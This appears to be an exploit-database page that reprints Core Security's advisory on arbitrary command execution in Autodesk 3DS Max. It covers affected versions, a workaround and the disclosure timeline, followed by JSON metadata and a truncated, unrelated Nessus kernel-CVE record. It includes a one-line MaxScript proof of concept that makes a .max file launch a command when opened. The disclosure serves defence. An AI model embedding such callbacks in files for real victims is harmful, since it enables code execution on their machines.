Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
2009-11-23T00:00:00
ID 1337DAY-ID-8160 Type zdt Reporter Core Security Modified 2009-11-23T00:00:00
Description
Exploit for unknown platform in category local exploits
==================================================================
Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
==================================================================
# Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Core Security
# Published: 2009-11-23
# Verified: yes
view source
print?
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs/
Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
1. *Advisory Information*
Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution
Advisory Id: CORE-2009-0909
Advisory URL:
http://www.coresecurity.com/content/3dsmax-arbitrary-command-execution
Date published: 2009-11-23
Date of last update: 2009-11-20
Vendors contacted: Autodesk
Release mode: User release
2. *Vulnerability Information*
Class: Failure to Sanitize Data into a Different Plane [CWE-74]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 36634
CVE Name: CVE-2009-3577
3. *Vulnerability Description*
Autodesk 3D Studio Max [2] is a modeling, animation and redering
package widely used for video game , film , multimedia and web content
developement. The software provides a built-in scripting language,
allowing users to bind custome code to actions performed in the
applciation. Execution of scripting code does not require explicit
permission from the user. This mechanim can be exploited by an
attacker to execute arbitrary code by enticing a victim to open .max
file with MaxScript application callbacks embedded.
4. *Vulnerable packages*
. Autodesk 3DSMax 2010
. Autodesk 3DSMax 2009
. Autodesk 3DSMax 2008
. Autodesk 3DSMax 9
. Autodesk 3DSMax 8
. Autodesk 3DSMax 7
. Autodesk 3DSMax 6
5. *Vendor Information, Solutions and Workarounds*
The vendor did not provide fixes or workaround information.
You can disable the automatic loading of embedded MaxScript by
following these steps:
. Go to Customize menu > Preferences > Preference Settings dialog >
MAXScript.
. Uncheck "Load/Save Scene Scripts".
. Uncheck "Load/Save Persistent Globals".
6. *Credits*
This vulnerability was discovered and researched by Sebastian Tello
from Core Security Technologies during Bugweek 2009 [1].
The publication of this advisory was coordinated by Fernando Russ from
Core Security Advisories Team.
7. *Technical Description / Proof of Concept Code*
Autodesk 3D Studio Max provides built-in scripting language called
MaxScript, which can be used to automate repetitive tasks, combine
existing functionality in new ways, develop new tools and user
interfaces and much more. Max allows users to bind MaxScript to
application callbacks in a way that could be exploited by an attacker
to execute arbitrary code by enticing a victim to open .max file with
MaxScript application callbacks embedded.
A Proof of Concept file can be obtained by following these simple
steps. Open Max, press F11 (MaxScript Listener), and paste this code:
/-----
callbacks.addScript #filePostOpen ("DOSCommand(\"calc.exe\")")
id:#mbLoadCallback persistent:true
- -----/
8. *Report Timeline*
. 2009-08-25:
Core Security Technologies ask the Autodesk Assistance Team for a
security contact to report the vulnerability.
. 2009-09-22:
Core asks the Autodesk Assistance Team for a security contact to
report the vulnerability.
. 2009-10-09:
Core contacts CERT to obtain security contact information for Autodesk.
. 2009-10-16:
CERT acknowledges the communication.
. 2009-10-19:
CERT sends their available contact information for Autodesk.
. 2009-10-19:
Core notifies Autodesk of the vulnerabilty report and announces its
initial plan to publish the content on November 2nd, 2009. Core
requests an acknoledgement within two working days and asks whehter
the details should be sent encrypted or in plaintext.
. 2009-10-19:
Autodesk acknowledges the report and requests the information to be
provided in encrypted form.
. 2009-10-20:
Core sends draft advisory and steps to reproduce the issue.
. 2009-10-27:
Core asks Autodesk about the status of the vulnerability report sent
on October 20th, 2009.
. 2009-10-27:
Autodesk acknowledges the communication indicating that the pertinent
Product Managers have been informed and are formulating a response.
. 2009-11-06:
Core notifies Autodesk about the missed deadline of November 2nd, 2009
and reuqests an status update. Publication of CORE-2009-0909 is
re-scheduled to November 16th, 2009 and is subject to change based on
concrete feedback from Autodesk.
. 2009-11-23:
Given the lack of response from Autodesk, Core decides to publish the
advisory CORE-2009-0909 as "user release".
9. *References*
[1] The author participated in Core Bugweek 2009 as member of the team
"Gimbal Lock N Load".
[2]
http://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112
10. *About CoreLabs*
CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://www.coresecurity.com/corelabs.
11. *About Core Security Technologies*
Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at http://www.coresecurity.com.
12. *Disclaimer*
The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.
13. *PGP/GPG Keys*
This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
iEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN
TPwAn1AMCamFLaX3gHyUys//tHcyhlvn
=fPrL
-----END PGP SIGNATURE-----
# 0day.today [2018-01-04] #
{"hash": "aa94db4fddd55e04d9e7b10f85b551ae6920a0f2c51b6df5b56de6c59da56701", "id": "1337DAY-ID-8160", "lastseen": "2018-01-04T17:08:55", "viewCount": 4, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "ae3b2b4186bdee4d3b6be3597325c52b", "key": "href"}, {"hash": "dd4730c620a74a730cc2c6122e8dc945", "key": "modified"}, {"hash": "dd4730c620a74a730cc2c6122e8dc945", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "e83e081743bdf2aa0b1e0232426d32e6", "key": "reporter"}, {"hash": "85df63db799910c9501679a8173df048", "key": "sourceData"}, {"hash": "662a6d499f227491d24b6014816014a1", "key": "sourceHref"}, {"hash": "afb46b3bff54195f3cf66351ee9f89b6", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 6.6, "vector": "NONE", "modified": "2018-01-04T17:08:55"}, "dependencies": {"references": [{"type": "kaspersky", "idList": ["KLA11316"]}, {"type": "cve", "idList": ["CVE-2017-5753"]}, {"type": "zdt", "idList": ["1337DAY-ID-28160", "1337DAY-ID-17648", "1337DAY-ID-11521", "1337DAY-ID-11353", "1337DAY-ID-3577", "1337DAY-ID-8774", "1337DAY-ID-7276"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310107160", "OPENVAS:1361412562310808586", "OPENVAS:1361412562310804322"]}, {"type": "nessus", "idList": ["FREESWITCH_FS8160.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:110665"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:27160"]}, {"type": "coresecurity", "idList": ["CORE-2009-0909"]}], "modified": "2018-01-04T17:08:55"}, "vulnersScore": 6.6}, "type": "zdt", "sourceHref": "https://0day.today/exploit/8160", "description": "Exploit for unknown platform in category local exploits", "title": "Autodesk 3DS Max Application Callbacks Arbitrary Command Execution", "history": [{"bulletin": {"hash": "016f951a9d10632c951438ba1c37bd774d6b1a758a477e3d142ad594c002bf5b", "id": "1337DAY-ID-8160", "lastseen": "2016-04-19T02:52:47", "enchantments": {"score": {"value": 8.3, "modified": "2016-04-19T02:52:47"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "510e6dd8f6275e8c47bd0bf88bd46103", "key": "href"}, {"hash": "dd4730c620a74a730cc2c6122e8dc945", "key": "published"}, {"hash": "eb0ef883c0c06ac8ef5e8a92acb8913e", "key": "sourceData"}, {"hash": "e83e081743bdf2aa0b1e0232426d32e6", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "afb46b3bff54195f3cf66351ee9f89b6", "key": "title"}, {"hash": "b6f0b5c2c11db073916796bee18fb666", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "d06ad7ff143665c64a72820273ef119b", "key": "sourceHref"}, {"hash": "dd4730c620a74a730cc2c6122e8dc945", "key": "modified"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/8160", "description": "Exploit for unknown platform in category local exploits", "viewCount": 0, "title": "Autodesk 3DS Max Application Callbacks Arbitrary Command Execution", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================================================\r\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n==================================================================\r\n\r\n\r\n# Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: Core Security\r\n# Published: 2009-11-23\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n \r\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n \r\n \r\n \r\n1. *Advisory Information*\r\n \r\nTitle: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\nAdvisory Id: CORE-2009-0909\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/3dsmax-arbitrary-command-execution\r\nDate published: 2009-11-23\r\nDate of last update: 2009-11-20\r\nVendors contacted: Autodesk\r\nRelease mode: User release\r\n \r\n \r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Failure to Sanitize Data into a Different Plane [CWE-74]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 36634\r\nCVE Name: CVE-2009-3577\r\n \r\n \r\n \r\n3. *Vulnerability Description*\r\n \r\nAutodesk 3D Studio Max [2] is a modeling, animation and redering\r\npackage widely used for video game , film , multimedia and web content\r\ndevelopement. The software provides a built-in scripting language,\r\nallowing users to bind custome code to actions performed in the\r\napplciation. Execution of scripting code does not require explicit\r\npermission from the user. This mechanim can be exploited by an\r\nattacker to execute arbitrary code by enticing a victim to open .max\r\nfile with MaxScript application callbacks embedded.\r\n \r\n \r\n4. *Vulnerable packages*\r\n \r\n . Autodesk 3DSMax 2010\r\n . Autodesk 3DSMax 2009\r\n . Autodesk 3DSMax 2008\r\n . Autodesk 3DSMax 9\r\n . Autodesk 3DSMax 8\r\n . Autodesk 3DSMax 7\r\n . Autodesk 3DSMax 6\r\n \r\n \r\n5. *Vendor Information, Solutions and Workarounds*\r\n \r\nThe vendor did not provide fixes or workaround information.\r\n \r\nYou can disable the automatic loading of embedded MaxScript by\r\nfollowing these steps:\r\n \r\n . Go to Customize menu > Preferences > Preference Settings dialog >\r\nMAXScript.\r\n . Uncheck \"Load/Save Scene Scripts\".\r\n . Uncheck \"Load/Save Persistent Globals\".\r\n \r\n \r\n6. *Credits*\r\n \r\nThis vulnerability was discovered and researched by Sebastian Tello\r\nfrom Core Security Technologies during Bugweek 2009 [1].\r\n \r\nThe publication of this advisory was coordinated by Fernando Russ from\r\nCore Security Advisories Team.\r\n \r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\nAutodesk 3D Studio Max provides built-in scripting language called\r\nMaxScript, which can be used to automate repetitive tasks, combine\r\nexisting functionality in new ways, develop new tools and user\r\ninterfaces and much more. Max allows users to bind MaxScript to\r\napplication callbacks in a way that could be exploited by an attacker\r\nto execute arbitrary code by enticing a victim to open .max file with\r\nMaxScript application callbacks embedded.\r\n \r\nA Proof of Concept file can be obtained by following these simple\r\nsteps. Open Max, press F11 (MaxScript Listener), and paste this code:\r\n \r\n/-----\r\n callbacks.addScript #filePostOpen (\"DOSCommand(\\\"calc.exe\\\")\")\r\nid:#mbLoadCallback persistent:true \r\n \r\n- -----/\r\n \r\n \r\n \r\n8. *Report Timeline*\r\n \r\n. 2009-08-25:\r\nCore Security Technologies ask the Autodesk Assistance Team for a\r\nsecurity contact to report the vulnerability.\r\n \r\n. 2009-09-22:\r\nCore asks the Autodesk Assistance Team for a security contact to\r\nreport the vulnerability.\r\n \r\n. 2009-10-09:\r\nCore contacts CERT to obtain security contact information for Autodesk.\r\n \r\n. 2009-10-16:\r\nCERT acknowledges the communication.\r\n \r\n. 2009-10-19:\r\nCERT sends their available contact information for Autodesk.\r\n \r\n. 2009-10-19:\r\nCore notifies Autodesk of the vulnerabilty report and announces its\r\ninitial plan to publish the content on November 2nd, 2009. Core\r\nrequests an acknoledgement within two working days and asks whehter\r\nthe details should be sent encrypted or in plaintext.\r\n \r\n. 2009-10-19:\r\nAutodesk acknowledges the report and requests the information to be\r\nprovided in encrypted form.\r\n \r\n. 2009-10-20:\r\nCore sends draft advisory and steps to reproduce the issue.\r\n \r\n. 2009-10-27:\r\nCore asks Autodesk about the status of the vulnerability report sent\r\non October 20th, 2009.\r\n \r\n. 2009-10-27:\r\nAutodesk acknowledges the communication indicating that the pertinent\r\nProduct Managers have been informed and are formulating a response.\r\n \r\n. 2009-11-06:\r\nCore notifies Autodesk about the missed deadline of November 2nd, 2009\r\nand reuqests an status update. Publication of CORE-2009-0909 is\r\nre-scheduled to November 16th, 2009 and is subject to change based on\r\nconcrete feedback from Autodesk.\r\n \r\n. 2009-11-23:\r\nGiven the lack of response from Autodesk, Core decides to publish the\r\nadvisory CORE-2009-0909 as \"user release\".\r\n \r\n \r\n \r\n9. *References*\r\n \r\n[1] The author participated in Core Bugweek 2009 as member of the team\r\n\"Gimbal Lock N Load\".\r\n[2]\r\nhttp://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112\r\n \r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is\r\ncharged with anticipating the future needs and requirements for\r\ninformation security technologies. We conduct our research in several\r\nimportant areas of computer security including system vulnerabilities,\r\ncyber attack planning and simulation, source code auditing, and\r\ncryptography. Our results include problem formalization,\r\nidentification of vulnerabilities, novel solutions and prototypes for\r\nnew technologies. CoreLabs regularly publishes security advisories,\r\ntechnical papers, project information and shared software tools for\r\npublic use at: http://www.coresecurity.com/corelabs.\r\n \r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources\r\nare exposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and\r\nsoftware security auditing. Based in Boston, MA and Buenos Aires,\r\nArgentina, Core Security Technologies can be reached at 617-399-6980\r\nor on the Web at http://www.coresecurity.com.\r\n \r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper\r\ncredit is given.\r\n \r\n \r\n13. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.12 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n \r\niEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN\r\nTPwAn1AMCamFLaX3gHyUys//tHcyhlvn\r\n=fPrL\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2009-11-23T00:00:00", "references": [], "reporter": "Core Security", "modified": "2009-11-23T00:00:00", "href": "http://0day.today/exploit/description/8160"}, "lastseen": "2016-04-19T02:52:47", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================================================\r\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n==================================================================\r\n\r\n\r\n# Title: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n# CVE-ID: ()\r\n# OSVDB-ID: ()\r\n# Author: Core Security\r\n# Published: 2009-11-23\r\n# Verified: yes\r\n\r\nview source\r\nprint?\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n \r\n Core Security Technologies - CoreLabs Advisory\r\n http://www.coresecurity.com/corelabs/\r\n \r\nAutodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\n \r\n \r\n \r\n1. *Advisory Information*\r\n \r\nTitle: Autodesk 3DS Max Application Callbacks Arbitrary Command Execution\r\nAdvisory Id: CORE-2009-0909\r\nAdvisory URL:\r\nhttp://www.coresecurity.com/content/3dsmax-arbitrary-command-execution\r\nDate published: 2009-11-23\r\nDate of last update: 2009-11-20\r\nVendors contacted: Autodesk\r\nRelease mode: User release\r\n \r\n \r\n \r\n2. *Vulnerability Information*\r\n \r\nClass: Failure to Sanitize Data into a Different Plane [CWE-74]\r\nImpact: Code execution\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nBugtraq ID: 36634\r\nCVE Name: CVE-2009-3577\r\n \r\n \r\n \r\n3. *Vulnerability Description*\r\n \r\nAutodesk 3D Studio Max [2] is a modeling, animation and redering\r\npackage widely used for video game , film , multimedia and web content\r\ndevelopement. The software provides a built-in scripting language,\r\nallowing users to bind custome code to actions performed in the\r\napplciation. Execution of scripting code does not require explicit\r\npermission from the user. This mechanim can be exploited by an\r\nattacker to execute arbitrary code by enticing a victim to open .max\r\nfile with MaxScript application callbacks embedded.\r\n \r\n \r\n4. *Vulnerable packages*\r\n \r\n . Autodesk 3DSMax 2010\r\n . Autodesk 3DSMax 2009\r\n . Autodesk 3DSMax 2008\r\n . Autodesk 3DSMax 9\r\n . Autodesk 3DSMax 8\r\n . Autodesk 3DSMax 7\r\n . Autodesk 3DSMax 6\r\n \r\n \r\n5. *Vendor Information, Solutions and Workarounds*\r\n \r\nThe vendor did not provide fixes or workaround information.\r\n \r\nYou can disable the automatic loading of embedded MaxScript by\r\nfollowing these steps:\r\n \r\n . Go to Customize menu > Preferences > Preference Settings dialog >\r\nMAXScript.\r\n . Uncheck \"Load/Save Scene Scripts\".\r\n . Uncheck \"Load/Save Persistent Globals\".\r\n \r\n \r\n6. *Credits*\r\n \r\nThis vulnerability was discovered and researched by Sebastian Tello\r\nfrom Core Security Technologies during Bugweek 2009 [1].\r\n \r\nThe publication of this advisory was coordinated by Fernando Russ from\r\nCore Security Advisories Team.\r\n \r\n \r\n7. *Technical Description / Proof of Concept Code*\r\n \r\nAutodesk 3D Studio Max provides built-in scripting language called\r\nMaxScript, which can be used to automate repetitive tasks, combine\r\nexisting functionality in new ways, develop new tools and user\r\ninterfaces and much more. Max allows users to bind MaxScript to\r\napplication callbacks in a way that could be exploited by an attacker\r\nto execute arbitrary code by enticing a victim to open .max file with\r\nMaxScript application callbacks embedded.\r\n \r\nA Proof of Concept file can be obtained by following these simple\r\nsteps. Open Max, press F11 (MaxScript Listener), and paste this code:\r\n \r\n/-----\r\n callbacks.addScript #filePostOpen (\"DOSCommand(\\\"calc.exe\\\")\")\r\nid:#mbLoadCallback persistent:true \r\n \r\n- -----/\r\n \r\n \r\n \r\n8. *Report Timeline*\r\n \r\n. 2009-08-25:\r\nCore Security Technologies ask the Autodesk Assistance Team for a\r\nsecurity contact to report the vulnerability.\r\n \r\n. 2009-09-22:\r\nCore asks the Autodesk Assistance Team for a security contact to\r\nreport the vulnerability.\r\n \r\n. 2009-10-09:\r\nCore contacts CERT to obtain security contact information for Autodesk.\r\n \r\n. 2009-10-16:\r\nCERT acknowledges the communication.\r\n \r\n. 2009-10-19:\r\nCERT sends their available contact information for Autodesk.\r\n \r\n. 2009-10-19:\r\nCore notifies Autodesk of the vulnerabilty report and announces its\r\ninitial plan to publish the content on November 2nd, 2009. Core\r\nrequests an acknoledgement within two working days and asks whehter\r\nthe details should be sent encrypted or in plaintext.\r\n \r\n. 2009-10-19:\r\nAutodesk acknowledges the report and requests the information to be\r\nprovided in encrypted form.\r\n \r\n. 2009-10-20:\r\nCore sends draft advisory and steps to reproduce the issue.\r\n \r\n. 2009-10-27:\r\nCore asks Autodesk about the status of the vulnerability report sent\r\non October 20th, 2009.\r\n \r\n. 2009-10-27:\r\nAutodesk acknowledges the communication indicating that the pertinent\r\nProduct Managers have been informed and are formulating a response.\r\n \r\n. 2009-11-06:\r\nCore notifies Autodesk about the missed deadline of November 2nd, 2009\r\nand reuqests an status update. Publication of CORE-2009-0909 is\r\nre-scheduled to November 16th, 2009 and is subject to change based on\r\nconcrete feedback from Autodesk.\r\n \r\n. 2009-11-23:\r\nGiven the lack of response from Autodesk, Core decides to publish the\r\nadvisory CORE-2009-0909 as \"user release\".\r\n \r\n \r\n \r\n9. *References*\r\n \r\n[1] The author participated in Core Bugweek 2009 as member of the team\r\n\"Gimbal Lock N Load\".\r\n[2]\r\nhttp://usa.autodesk.com/adsk/servlet/pc/index?id=13567410&siteID=123112\r\n \r\n \r\n10. *About CoreLabs*\r\n \r\nCoreLabs, the research center of Core Security Technologies, is\r\ncharged with anticipating the future needs and requirements for\r\ninformation security technologies. We conduct our research in several\r\nimportant areas of computer security including system vulnerabilities,\r\ncyber attack planning and simulation, source code auditing, and\r\ncryptography. Our results include problem formalization,\r\nidentification of vulnerabilities, novel solutions and prototypes for\r\nnew technologies. CoreLabs regularly publishes security advisories,\r\ntechnical papers, project information and shared software tools for\r\npublic use at: http://www.coresecurity.com/corelabs.\r\n \r\n \r\n11. *About Core Security Technologies*\r\n \r\nCore Security Technologies develops strategic solutions that help\r\nsecurity-conscious organizations worldwide develop and maintain a\r\nproactive process for securing their networks. The company's flagship\r\nproduct, CORE IMPACT, is the most comprehensive product for performing\r\nenterprise security assurance testing. CORE IMPACT evaluates network,\r\nendpoint and end-user vulnerabilities and identifies what resources\r\nare exposed. It enables organizations to determine if current security\r\ninvestments are detecting and preventing attacks. Core Security\r\nTechnologies augments its leading technology solution with world-class\r\nsecurity consulting services, including penetration testing and\r\nsoftware security auditing. Based in Boston, MA and Buenos Aires,\r\nArgentina, Core Security Technologies can be reached at 617-399-6980\r\nor on the Web at http://www.coresecurity.com.\r\n \r\n \r\n12. *Disclaimer*\r\n \r\nThe contents of this advisory are copyright (c) 2009 Core Security\r\nTechnologies and (c) 2009 CoreLabs, and may be distributed freely\r\nprovided that no fee is charged for this distribution and proper\r\ncredit is given.\r\n \r\n \r\n13. *PGP/GPG Keys*\r\n \r\nThis advisory has been signed with the GPG key of Core Security\r\nTechnologies advisories team, which is available for download at\r\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.\r\n \r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.12 (MingW32)\r\nComment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/\r\n \r\niEYEARECAAYFAksK5boACgkQyNibggitWa1jTgCgsSlNJKsbVSRtXaFylOQNbpCN\r\nTPwAn1AMCamFLaX3gHyUys//tHcyhlvn\r\n=fPrL\r\n-----END PGP SIGNATURE-----\r\n\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-04] #", "published": "2009-11-23T00:00:00", "references": [], "reporter": "Core Security", "modified": "2009-11-23T00:00:00", "href": "https://0day.today/exploit/description/8160"}
{"nessus": [{"lastseen": "2019-11-01T02:06:29", "bulletinFamily": "scanner", "description": "According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The x25_negotiate_facilities function in\n net/x25/x25_facilities.c in the Linux kernel before\n 4.5.5 does not properly initialize a certain data\n structure, which allows attackers to obtain sensitive\n information from kernel stack memory via an X.25 Call\n Request.(CVE-2016-4580)\n\n - A flaw was found in the Linux kernel", "modified": "2019-11-02T00:00:00", "id": "EULEROS_SA-2019-1474.NASL", "href": "https://www.tenable.com/plugins/nessus/124798", "published": "2019-05-13T00:00:00", "title": "EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1474)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(124798);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/06/27 13:33:25\");\n\n script_cve_id(\n \"CVE-2013-2898\",\n \"CVE-2013-4514\",\n \"CVE-2014-1690\",\n \"CVE-2014-4656\",\n \"CVE-2014-8160\",\n \"CVE-2014-8559\",\n \"CVE-2014-9729\",\n \"CVE-2015-3212\",\n \"CVE-2015-7799\",\n \"CVE-2015-7872\",\n \"CVE-2016-10200\",\n \"CVE-2016-4580\",\n \"CVE-2016-7910\",\n \"CVE-2017-11600\",\n \"CVE-2017-16532\",\n \"CVE-2017-5972\",\n \"CVE-2018-1066\",\n \"CVE-2018-11506\",\n \"CVE-2018-14615\",\n \"CVE-2018-8781\"\n );\n script_bugtraq_id(\n 62056,\n 63509,\n 65180,\n 68163,\n 70854,\n 72061,\n 74964\n );\n\n script_name(english:\"EulerOS Virtualization for ARM 64 3.0.1.0 : kernel (EulerOS-SA-2019-1474)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS Virtualization for ARM 64 host is missing multiple security\nupdates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS Virtualization for ARM 64 installation on the remote host is\naffected by the following vulnerabilities :\n\n - The x25_negotiate_facilities function in\n net/x25/x25_facilities.c in the Linux kernel before\n 4.5.5 does not properly initialize a certain data\n structure, which allows attackers to obtain sensitive\n information from kernel stack memory via an X.25 Call\n Request.(CVE-2016-4580)\n\n - A flaw was found in the Linux kernel's implementation\n of seq_file where a local attacker could manipulate\n memory in the put() function pointer. This could lead\n to memory corruption and possible privileged\n escalation.(CVE-2016-7910)\n\n - A flaw was found in the way the Linux kernel's\n netfilter subsystem handled generic protocol tracking.\n As demonstrated in the Stream Control Transmission\n Protocol (SCTP) case, a remote attacker could use this\n flaw to bypass intended iptables rule restrictions when\n the associated connection tracking module was not\n loaded on the system.(CVE-2014-8160)\n\n - The get_endpoints function in\n drivers/usb/misc/usbtest.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (NULL pointer dereference and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16532)\n\n - An integer overflow flaw was found in the way the Linux\n kernel's Advanced Linux Sound Architecture (ALSA)\n implementation handled user controls. A local,\n privileged user could use this flaw to crash the\n system.(CVE-2014-4656)\n\n - The sr_do_ioctl function in drivers/scsi/sr_ioctl.c in\n the Linux kernel through 4.16.12 allows local users to\n cause a denial of service (stack-based buffer overflow)\n or possibly have unspecified other impact because sense\n buffers have different sizes at the CDROM layer and the\n SCSI layer.(CVE-2018-11506)\n\n - A race condition flaw was found in the way the Linux\n kernel's SCTP implementation handled Address\n Configuration lists when performing Address\n Configuration Change (ASCONF). A local attacker could\n use this flaw to crash the system via a race condition\n triggered by setting certain ASCONF options on a\n socket.(CVE-2015-3212)\n\n - A symlink size validation was missing in Linux kernels\n built with UDF file system (CONFIG_UDF_FS) support,\n allowing the corruption of kernel memory. An attacker\n able to mount a corrupted/malicious UDF file system\n image could cause the kernel to crash.(CVE-2014-9729)\n\n - The Linux kernel before version 4.11 is vulnerable to a\n NULL pointer dereference in\n fs/cifs/cifsencrypt.c:setup_ntlmv2_rsp() that allows an\n attacker controlling a CIFS server to kernel panic a\n client that has this server mounted, because an empty\n TargetInfo field in an NTLMSSP setup negotiation\n response is mishandled during session\n recovery.(CVE-2018-1066)\n\n - drivers/hid/hid-sensor-hub.c in the Human Interface\n Device (HID) subsystem in the Linux kernel through\n 3.11, when CONFIG_HID_SENSOR_HUB is enabled, allows\n physically proximate attackers to obtain sensitive\n information from kernel memory via a crafted\n device.(CVE-2013-2898)\n\n - An issue was discovered in the Linux kernel's F2FS\n filesystem code. A buffer overflow in\n truncate_inline_inode() in the fs/f2fs/inline.c\n function, when umounting a crafted f2fs image, can\n occur because a length value may be\n negative.(CVE-2018-14615)\n\n - The help function in net/netfilter/nf_nat_irc.c in the\n Linux kernel before 3.12.8 allows remote attackers to\n obtain sensitive information from kernel memory by\n establishing an IRC 